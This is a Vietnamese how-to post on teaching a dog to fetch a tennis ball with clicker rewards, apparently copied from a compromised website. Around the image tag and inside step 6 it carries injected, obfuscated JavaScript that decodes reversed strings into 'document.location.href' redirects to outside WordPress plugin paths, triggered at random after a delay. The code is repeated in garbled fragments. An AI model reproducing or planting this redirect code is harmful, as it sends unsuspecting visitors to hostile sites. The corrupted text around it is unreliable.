Cách dạy chó nhặt đồ

Trong bài viết này mình hướng dẫn dùng bóng tennis, khá phổ thông cho chó chơi đùa.
$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.r andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);} andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);} andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);} andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);} andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);} andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);} andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);} and-tennis-ball.jpg”>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.r andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);} andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);} andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);} andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);} andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);} andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);} andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);} and-tennis-ball.jpg” alt=”” width=”400″ height=”251″ border=”0″ />
1. Cầm bóng đưa vào miệng chó bắt chó ngậm giữ chặt bóng, để vài giây lấy bóng ra . Bấm clicker thưởng đồ ăn ngay.
2. Lặp đi lặp lại 10 – 20 lần bước 1.
3. Thả bóng xuống đất nếu nó ngậm bóng, bấm clicker ngay. Thưởng đồ ăn.
4. Lặp đi lặp lại 20 lần bước 3.
5. Thả bóng ra xa cách chỗ mình khoảng ngắn 1m. Nếu chó ngậm và đưa về chỗ mình bấm clicker tiếp và thưởng đồ ăn.
Chú ý : nếu thả ra xa mà chó ko mang bóng về làm lại bước 3.
Chú ý : Nếu chó đưa bóng về mà ko nhả bóng ra thì bạn ko bấm clicker vội, khi nào chó nhả ra bạn hãy bấm ngay lúc đó. Nếu nó vẫn ko chịu nhả, bản lấy từ miệng nó rồi mới bấm.
6. Làm liên tục khi chó đã quen đẩy bóng ra xa. Hô toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);} to nhặt , lặp đi nhiều lần, chó quen lệnh và đã hoàn thành, cần làm nhiều lần hàng ngày chó quen lệnh có thể đi chơi đc rồi
Theo phamcukennel